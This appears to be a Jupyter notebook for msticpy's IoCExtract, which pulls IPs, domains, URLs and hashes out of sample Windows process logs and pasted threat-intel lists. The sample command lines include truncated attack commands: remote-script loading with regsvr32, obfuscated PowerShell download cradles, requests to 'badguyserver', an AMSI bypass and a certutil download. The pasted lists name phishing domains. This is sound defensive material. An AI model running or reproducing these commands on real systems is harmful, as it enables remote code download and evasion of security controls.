# Imports
import sys
# Oldest interpreter this notebook is written for.
MIN_REQ_PYTHON = (3, 6)
if sys.version_info[:2] < MIN_REQ_PYTHON:
    # Explain the remedy on stdout first; sys.exit() with a string message
    # then writes it to stderr and terminates with exit status 1.
    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6',
          'or later is selected as the active kernel.', sep='\n')
    sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)
from IPython import get_ipython
from IPython.display import display, HTML
import matplotlib.pyplot as plt
import pandas as pd
# Raise pandas' display limits so the IoC result frames (which can be long
# and have wide text columns) are shown rather than truncated.
# set_option accepts several pattern/value pairs in one call.
pd.set_option(
    'display.max_rows', 500,
    'display.max_columns', 50,
    'display.max_colwidth', 100,
)
import msticpy
# Wire msticpy's notebook helpers into this namespace. verbosity=0 presumably
# quiets its start-up output; the trailing ';' keeps IPython from echoing the
# call's return value as cell output.
msticpy.init_notebook(globals(), verbosity=0);
# Load test data
# Sample process-creation events shipped with the docs; the path is relative
# to the notebook's working directory.
process_tree = pd.read_csv(filepath_or_buffer='data/process_tree.csv')
# Peek at the first few command lines to confirm the load worked.
process_tree.loc[:, ['CommandLine']].head()
CommandLine | |
---|---|
0 | .\ftp -s:C:\RECYCLER\xxppyy.exe |
1 | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! |
2 | cmd /c "systeminfo && systeminfo" |
3 | .\rundll32 /C 42424.exe |
4 | .\rundll32 /C c:\users\MSTICAdmin\42424.exe |
# get a commandline from our data set
# Pull one command line (row 78 of the sample data) to use as the string
# input for the extractor.
cmdline = process_tree.loc[78, 'CommandLine']
# Echo it so the raw value is visible next to the extraction result.
cmdline
'netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt'
# Instantiate an IoCExtract object
from msticpy.transform.iocextract import IoCExtract
# Create the extractor once; the instance can be reused for later calls.
ioc_extractor = IoCExtract()
# With a plain string input, extract() returns a dict keyed by IoC type;
# an empty result is falsy, so nothing is printed when there are no hits.
iocs_found = ioc_extractor.extract(cmdline)
if iocs_found:
    print('\nPotential IoCs found in alert process:')
    display(iocs_found)
Potential IoCs found in alert process:
defaultdict(set, {'ipv4': {'1.2.3.4'}, 'windows_path': {'C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt'}})
# Fresh extractor; with data= and columns= extract() returns a DataFrame of
# matches (IoCType, Observable, SourceIndex, Input) instead of a dict.
ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=process_tree, columns=['CommandLine'])
if len(ioc_df) > 0:
    # The heading is a fixed literal, so it is safe to render as raw HTML.
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df)
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | dns | microsoft.com | 24 | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... |
1 | url | http://server/file.sct | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | dns | server | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
3 | dns | evil.ps | 35 | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | dns | blah.ps | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
7 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
8 | dns | blah.ps | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
9 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
10 | md5_hash | 81ed03caf6901e444c72ac67d192fb9c | 44 | implant.exe 81ed03caf6901e444c72ac67d192fb9c |
11 | url | http://badguyserver/pwnme | 46 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
12 | dns | badguyserver | 46 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
13 | url | http://badguyserver/pwnme | 47 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
14 | dns | badguyserver | 47 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
15 | dns | Invoke-Shellcode.ps | 48 | .\powershell Invoke-Shellcode.ps1 |
16 | dns | Invoke-ReverseDnsLookup.ps | 49 | .\powershell Invoke-ReverseDnsLookup.ps1 |
17 | dns | Wscript.Shell | 67 | cmd /c C:\Windows\System32\mshta.exe vbscript:CreateObject("Wscript.Shell").Run(".\powershell.e... |
18 | url | http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | 77 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
19 | dns | system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | 77 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
20 | ipv4 | 1.2.3.4 | 78 | netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\b... |
21 | dns | wscript.shell | 81 | cmd /c "powershell wscript.shell used to download a .gif" |
22 | dns | abc.com | 90 | c:\Diagnostics\UserTmp\ransomware.exe @ abc.com abc.wallet |
23 | ipv4 | 127.0.0.1 | 102 | certutil -urlcache -split -f http://127.0.0.1/ |
24 | url | http://127.0.0.1/ | 102 | certutil -urlcache -split -f http://127.0.0.1/ |
# IoCExtract docstring
ioc_extractor.extract?
Signature: ioc_extractor.extract( src: str = None, data: pandas.core.frame.DataFrame = None, columns: List[str] = None, **kwargs, ) -> Union[Dict[str, Set[str]], pandas.core.frame.DataFrame] Docstring: Extract IoCs from either a string or pandas DataFrame. Parameters ---------- src : str, optional source string in which to look for IoC patterns (the default is None) data : pd.DataFrame, optional input DataFrame from which to read source strings (the default is None) columns : list, optional The list of columns to use as source strings, if the `data` parameter is used. (the default is None) Other Parameters ---------------- ioc_types : list, optional Restrict matching to just specified types. (default is all types) include_paths : bool, optional Whether to include path matches (which can be noisy) (the default is false - excludes 'windows_path' and 'linux_path'). If `ioc_types` is specified this parameter is ignored. ignore_tlds : bool, optional If True, ignore the official Top Level Domains list when determining whether a domain name is a legal domain. Returns ------- Any dict of found observables (if input is a string) or DataFrame of observables Notes ----- Extract takes either a string or a pandas DataFrame as input. When using the string option as an input extract will return a dictionary of results. When using a DataFrame the results will be returned as a new DataFrame with the following columns: - IoCType: the mnemonic used to distinguish different IoC Types - Observable: the actual value of the observable - SourceIndex: the index of the row in the input DataFrame from which the source for the IoC observable was extracted. IoCType Pattern selection The default list is: ['ipv4', 'ipv6', 'dns', 'url', 'md5_hash', 'sha1_hash', 'sha256_hash'] plus any user-defined types. 'windows_path', 'linux_path' are excluded unless `include_paths` is True or explicitly included in `ioc_paths`. File: e:\src\msticpy\msticpy\transform\iocextract.py Type: method
from html import escape
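# Show the regex behind each registered IoC type. Both the type name and the
# pattern are HTML-escaped before being embedded: patterns contain '<', '>'
# and quotes, and a type name is caller-supplied (add_ioc_type accepts any
# str), so neither should reach the browser unescaped. The original escaped
# only the pattern.
extractor = IoCExtract()
for ioc_type, pattern in extractor.ioc_types.items():
    esc_type = escape(ioc_type)
    esc_pattern = escape(pattern.comp_regex.pattern.strip())
    display(HTML(f'<b>{esc_type}</b>'))
    display(HTML(f'<div style="margin-left:20px"><pre>{esc_pattern}</pre></div>'))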
(?P<ipaddress>(?:[0-9]{1,3}\.){3}[0-9]{1,3})
(?<![:.\w])(?:[A-F0-9]{0,4}:){2,7}[A-F0-9]{0,4}(?![:.\w])
((?=[a-z0-9-]{1,63}\.)[a-z0-9]+(-[a-z0-9]+)*\.){1,126}[a-z]{2,63}
(?P<protocol>(https?|ftp|telnet|ldap|file)://) (?P<userinfo>([a-z0-9-._~!$&\'()*+,;=:]|%[0-9A-F]{2})*@)? (?P<host>([a-z0-9-._~!$&\'()*+,;=]|%[0-9A-F]{2})*) (:(?P<port>\d*))? (/(?P<path>([^?\#"<>\s]|%[0-9A-F]{2})*/?))? (\?(?P<query>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))? (\#(?P<fragment>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?
(?P<root>[a-z]:|\\\\[a-z0-9_.$-]+||[.]+) (?P<folder>\\(?:[^\/:*?"\'<>|\r\n]+\\)*) (?P<file>[^\\/*?""<>|\r\n ]+)
(?P<root>/+||[.]+) (?P<folder>/(?:[^\\/:*?<>|\r\n]+/)*) (?P<file>[^/\0<>|\r\n ]+)
(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0-9])
(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{40})(?:$|[^A-Fa-f0-9])
(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{64})(?:$|[^A-Fa-f0-9])
Docstring:
Add an IoC type and regular expression to use to the built-in set.
Parameters
----------
ioc_type : str
A unique name for the IoC type
ioc_regex : str
A regular expression used to search for the type
priority : int, optional
Priority of the regex match vs. other ioc_patterns. 0 is
the highest priority (the default is 0).
group : str, optional
The regex group to match (the default is None,
which will match on the whole expression)
Notes
-----
Pattern priorities.
If two IocType patterns match on the same substring, the matched
substring is assigned to the pattern/IocType with the highest
priority. E.g. `foo.bar.com` will match types: `dns`, `windows_path`
and `linux_path` but since `dns` has a higher priority, the expression
is assigned to the `dns` matches.
import re
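# Regex for Windows named pipes such as \\.\pipe\name (raw string: the
# backslashes are regex escapes). Note the capture runs until whitespace or a
# backslash, so a trailing quote is kept (visible in the sample output below).
named_pipe_regex = r'(?P<pipe>\\\\\.\\pipe\\[^\s\\]+)'
# Compile it first so a malformed pattern fails here with a clear re.error
# rather than inside the extractor; rcomp is kept for that check only.
rcomp = re.compile(named_pipe_regex)
# Register the pattern once, from the same variable, so the two cannot drift.
extractor.add_ioc_type(ioc_type='win_named_pipe', ioc_regex=named_pipe_regex)
# Check that it added ok
print(extractor.ioc_types['win_named_pipe'])
# Use it in our data set, querying the instance the type was registered on;
# whether add_ioc_type is shared across instances is not visible here.
extractor.extract(data=process_tree, columns=['CommandLine']).query("IoCType == 'win_named_pipe'")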
IoCPattern(ioc_type='win_named_pipe', comp_regex=re.compile('(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)', re.IGNORECASE|re.MULTILINE|re.VERBOSE), priority=0, group=None)
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
25 | win_named_pipe | \\.\pipe\blahtest" | 107 | cmd /c "echo blahtest > \\.\pipe\blahtest" |
Parameters
----------
src : str, optional
source string in which to look for IoC patterns
(the default is None)
data : pd.DataFrame, optional
input DataFrame from which to read source strings
(the default is None)
columns : list, optional
The list of columns to use as source strings,
if the `data` parameter is used. (the default is None)
Other Parameters
----------------
ioc_types : list, optional
Restrict matching to just specified types.
(default is all types)
include_paths : bool, optional
Whether to include path matches (which can be noisy)
(the default is false - excludes 'windows_path'
and 'linux_path'). If `ioc_types` is specified
this parameter is ignored.
Returns
-------
Any
dict of found observables (if input is a string) or
DataFrame of observables
Notes
-----
Extract takes either a string or a pandas DataFrame as input.
When using the string option as an input extract will
return a dictionary of results.
When using a DataFrame the results will be returned as a new
DataFrame with the following columns:
- IoCType: the mnemonic used to distinguish different IoC Types
- Observable: the actual value of the observable
- SourceIndex: the index of the row in the input DataFrame from
which the source for the IoC observable was extracted.
IoCType Pattern selection
The default list is: ['ipv4', 'ipv6', 'dns', 'url',
'md5_hash', 'sha1_hash', 'sha256_hash'] plus any
user-defined types.
'windows_path', 'linux_path' are excluded unless `include_paths`
is True or they are explicitly included in `ioc_types`.
# You can specify multiple columns
# Several columns can be scanned in one call; each match records the input
# row it came from in SourceIndex. Show only the first ten matches.
multi_col_iocs = ioc_extractor.extract(data=process_tree, columns=['NewProcessName', 'CommandLine'])
multi_col_iocs.head(n=10)
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | dns | microsoft.com | 24 | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... |
1 | url | http://server/file.sct | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | dns | server | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
3 | dns | evil.ps | 35 | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | dns | blah.ps | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
7 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
8 | dns | blah.ps | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
9 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
`extract_df` functions identically to `extract` with a `data` parameter. It may be more convenient to use this when you know that your input is a DataFrame.
# extract_df() takes the DataFrame positionally; the columns= argument works
# as for extract(data=...). Show the first ten matches.
df_iocs = ioc_extractor.extract_df(process_tree, columns=['NewProcessName', 'CommandLine'])
df_iocs.head(n=10)
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | dns | microsoft.com | 24 | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... |
1 | url | http://server/file.sct | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | dns | server | 31 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
3 | dns | evil.ps | 35 | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 37 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | dns | blah.ps | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
7 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
8 | dns | blah.ps | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
9 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 | cmd /c "echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1" |
Where an input row has multiple IoC matches, the merge produces one output row per match, so that input row is duplicated. The previous index is preserved in the second column (and in the SourceIndex column).
Note: you will need to set the type of the SourceIndex column. In the example below we are matching with the default numeric index, so we force the type to be numeric. If you are using an index of a different dtype, you will need to convert the SourceIndex column (dtype=object) to match the type of your index column.
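# Work on a small slice so the merged result is easy to read. The original
# chained assignment (`input_df = data = ...`) also left a stray `data` name
# behind; a single assignment is intended.
input_df = process_tree.head(20)
output_df = ioc_extractor.extract(data=input_df, columns=['NewProcessName', 'CommandLine'])
# SourceIndex comes back as dtype=object; cast it to numeric to match
# input_df's default integer index so the merge keys compare equal.
output_df['SourceIndex'] = pd.to_numeric(output_df['SourceIndex'])
# Outer merge keeps input rows with no IoC hit (their IoC columns become NaN)
# and repeats an input row once per match.
merged_df = pd.merge(left=input_df, right=output_df, how='outer', left_index=True, right_on='SourceIndex')
merged_df.head()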
Unnamed: 0 | TenantId | Account | EventID | TimeGenerated | Computer | SubjectUserSid | SubjectUserName | SubjectDomainName | SubjectLogonId | NewProcessId | NewProcessName | TokenElevationType | ProcessId | CommandLine | ParentProcessName | TargetLogonId | SourceComputerId | TimeCreatedUtc | NodeRole | Level | ProcessId1 | NewProcessId1 | IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 0 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:15.677 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x1580 | C:\Diagnostics\UserTmp\ftp.exe | %%1936 | 0xbc8 | .\ftp -s:C:\RECYCLER\xxppyy.exe | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:15.677 | source | 0 | NaN | NaN | NaN | NaN | 0 | NaN |
1 | 1 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:16.167 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x16fc | C:\Diagnostics\UserTmp\reg.exe | %%1936 | 0xbc8 | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:16.167 | sibling | 1 | NaN | NaN | NaN | NaN | 1 | NaN |
2 | 2 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:16.277 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x1700 | C:\Diagnostics\UserTmp\cmd.exe | %%1936 | 0xbc8 | cmd /c "systeminfo && systeminfo" | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:16.277 | sibling | 1 | NaN | NaN | NaN | NaN | 2 | NaN |
3 | 3 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:16.340 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x1728 | C:\Diagnostics\UserTmp\rundll32.exe | %%1936 | 0xbc8 | .\rundll32 /C 42424.exe | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:16.340 | sibling | 1 | NaN | NaN | NaN | NaN | 3 | NaN |
4 | 4 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4688 | 2019-01-15 05:15:16.400 | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | MSTICAdmin | MSTICAlertsWin1 | 0xfaac27 | 0x175c | C:\Diagnostics\UserTmp\rundll32.exe | %%1936 | 0xbc8 | .\rundll32 /C c:\users\MSTICAdmin\42424.exe | C:\Windows\System32\cmd.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:15:16.400 | sibling | 1 | NaN | NaN | NaN | NaN | 4 | NaN |
You can use the line magic `%ioc` or the cell magic `%%ioc` to extract IoCs from text pasted directly into a cell.
The ioc magic supports the following options:
--out OUT, -o OUT
The variable (`OUT`) in which to return the results.
Note: the output variable is a dictionary of IoCs grouped by IoC type.
--ioc_types IOC_TYPES, -i IOC_TYPES
The types of IoC to search for (a comma-separated string).
%%ioc --out ioc_capture
netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\Users\user\AppData\Local\Temp\bzzzzzz.txt
hostname customers-service.ddns.net Feb 5, 2020, 2:20:35 PM 7
URL https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password Feb 5, 2020, 2:20:35 PM 1
hostname mobile.phonechallenges-submit.site Feb 5, 2020, 2:20:35 PM 8
hostname youtube.service-activity-checkup.site Feb 5, 2020, 2:20:35 PM 8
hostname www.drive-accounts.com Feb 5, 2020, 2:20:35 PM 7
hostname google.drive-accounts.com Feb 5, 2020, 2:20:35 PM 7
domain niaconucil.org Feb 5, 2020, 2:20:35 PM 11
domain isis-online.net Feb 5, 2020, 2:20:35 PM 11
domain bahaius.info Feb 5, 2020, 2:20:35 PM 11
domain w3-schools.org Feb 5, 2020, 2:20:35 PM 12
domain system-services.site Feb 5, 2020, 2:20:35 PM 11
domain accounts-drive.com Feb 5, 2020, 2:20:35 PM 8
domain drive-accounts.com Feb 5, 2020, 2:20:35 PM 10
domain service-issues.site Feb 5, 2020, 2:20:35 PM 8
domain two-step-checkup.site Feb 5, 2020, 2:20:35 PM 8
domain customers-activities.site Feb 5, 2020, 2:20:35 PM 11
domain seisolarpros.org Feb 5, 2020, 2:20:35 PM 11
domain yah00.site Feb 5, 2020, 2:20:35 PM 4
domain skynevvs.com Feb 5, 2020, 2:20:35 PM 11
domain recovery-options.site Feb 5, 2020, 2:20:35 PM 4
domain malcolmrifkind.site Feb 5, 2020, 2:20:35 PM 8
domain instagram-com.site Feb 5, 2020, 2:20:35 PM 8
domain leslettrespersanes.net Feb 5, 2020, 2:20:35 PM 11
domain software-updating-managers.site Feb 5, 2020, 2:20:35 PM 8
domain cpanel-services.site Feb 5, 2020, 2:20:35 PM 8
domain service-activity-checkup.site Feb 5, 2020, 2:20:35 PM 7
domain inztaqram.ga Feb 5, 2020, 2:20:35 PM 8
domain unirsd.com Feb 5, 2020, 2:20:35 PM 8
domain phonechallenges-submit.site Feb 5, 2020, 2:20:35 PM 7
domain acconut-verify.com Feb 5, 2020, 2:20:35 PM 11
domain finance-usbnc.info Feb 5, 2020, 2:20:35 PM 8
FileHash-MD5 542128ab98bda5ea139b169200a50bce Feb 5, 2020, 2:20:35 PM 3
FileHash-MD5 3d67ce57aab4f7f917cf87c724ed7dab Feb 5, 2020, 2:20:35 PM 3
hostname x09live-ix3b.account-profile-users.info Feb 6, 2020, 2:56:07 PM 0
hostname www.phonechallenges-submit.site Feb 6, 2020, 2:56:07 PM
[('ipv4', ['1.2.3.4']), ('ipv6', ['2:56:07', '2:20:35']), ('dns', ['finance-usbnc.info', 'www.phonechallenges-submit.site', 'acconut-verify.com', 'phonechallenges-submit.site', 'seisolarpros.org', 'youtube.service-activity-checkup.site', 'w3-schools.org', 'isis-online.net', 'two-step-checkup.site', 'recovery-options.site', 'inztaqram.ga', 'system-services.site', 'malcolmrifkind.site', 'instagram-com.site', 'cpanel-services.site', 'niaconucil.org', 'accounts-drive.com', 'software-updating-managers.site', 'www.drive-accounts.com', 'service-issues.site', 'customers-activities.site', 'x09live-ix3b.account-profile-users.info', 'unirsd.com', 'bahaius.info', 'skynevvs.com', 'customers-service.ddns.net', 'leslettrespersanes.net', 'google.drive-accounts.com', 'drive-accounts.com', 'service-activity-checkup.site', 'mobile.phonechallenges-submit.site', 'yah00.site']), ('url', ['https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password']), ('windows_path', ['C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt']), ('linux_path', ['//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb']), ('md5_hash', ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]
# Summarize captured types: one (type, count) pair per key of the dict the
# %%ioc magic stored in ioc_capture. Counts are raw pattern hits, not vetted
# IoCs - e.g. the 'ipv6' entries in the output above are clock times
# (2:56:07, 2:20:35) that happen to fit the pattern.
summary = [(ioc_type, len(hits)) for ioc_type, hits in ioc_capture.items()]
print(summary)
[('ipv4', 1), ('ipv6', 2), ('dns', 32), ('url', 1), ('windows_path', 1), ('linux_path', 1), ('md5_hash', 2)]
%%ioc --ioc_types "ipv4, ipv6, linux_path, md5_hash"
netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\Users\user\AppData\Local\Temp\bzzzzzz.txt
tracefile2=/usr/localbzzzzzz.sh
hostname customers-service.ddns.net Feb 5, 2020, 2:20:35 PM 7
URL https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password Feb 5, 2020, 2:20:35 PM 1
hostname mobile.phonechallenges-submit.site Feb 5, 2020, 2:20:35 PM 8
hostname youtube.service-activity-checkup.site Feb 5, 2020, 2:20:35 PM 8
hostname www.drive-accounts.com Feb 5, 2020, 2:20:35 PM 7
hostname google.drive-accounts.com Feb 5, 2020, 2:20:35 PM 7
domain niaconucil.org Feb 5, 2020, 2:20:35 PM 11
domain isis-online.net Feb 5, 2020, 2:20:35 PM 11
domain bahaius.info Feb 5, 2020, 2:20:35 PM 11
domain w3-schools.org Feb 5, 2020, 2:20:35 PM 12
domain system-services.site Feb 5, 2020, 2:20:35 PM 11
domain accounts-drive.com Feb 5, 2020, 2:20:35 PM 8
domain drive-accounts.com Feb 5, 2020, 2:20:35 PM 10
domain service-issues.site Feb 5, 2020, 2:20:35 PM 8
domain two-step-checkup.site Feb 5, 2020, 2:20:35 PM 8
domain customers-activities.site Feb 5, 2020, 2:20:35 PM 11
domain seisolarpros.org Feb 5, 2020, 2:20:35 PM 11
domain yah00.site Feb 5, 2020, 2:20:35 PM 4
domain skynevvs.com Feb 5, 2020, 2:20:35 PM 11
domain recovery-options.site Feb 5, 2020, 2:20:35 PM 4
domain malcolmrifkind.site Feb 5, 2020, 2:20:35 PM 8
domain instagram-com.site Feb 5, 2020, 2:20:35 PM 8
domain leslettrespersanes.net Feb 5, 2020, 2:20:35 PM 11
domain software-updating-managers.site Feb 5, 2020, 2:20:35 PM 8
domain cpanel-services.site Feb 5, 2020, 2:20:35 PM 8
domain service-activity-checkup.site Feb 5, 2020, 2:20:35 PM 7
domain inztaqram.ga Feb 5, 2020, 2:20:35 PM 8
domain unirsd.com Feb 5, 2020, 2:20:35 PM 8
domain phonechallenges-submit.site Feb 5, 2020, 2:20:35 PM 7
domain acconut-verify.com Feb 5, 2020, 2:20:35 PM 11
domain finance-usbnc.info Feb 5, 2020, 2:20:35 PM 8
FileHash-MD5 542128ab98bda5ea139b169200a50bce Feb 5, 2020, 2:20:35 PM 3
FileHash-MD5 3d67ce57aab4f7f917cf87c724ed7dab Feb 5, 2020, 2:20:35 PM 3
hostname x09live-ix3b.account-profile-users.info Feb 6, 2020, 2:56:07 PM 0
hostname www.phonechallenges-submit.site Feb 6, 2020, 2:56:07 PM
[('ipv4', ['1.2.3.4']), ('ipv6', ['2:56:07', '2:20:35']), ('linux_path', ['/usr/localbzzzzzz.sh', '//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb']), ('md5_hash', ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]
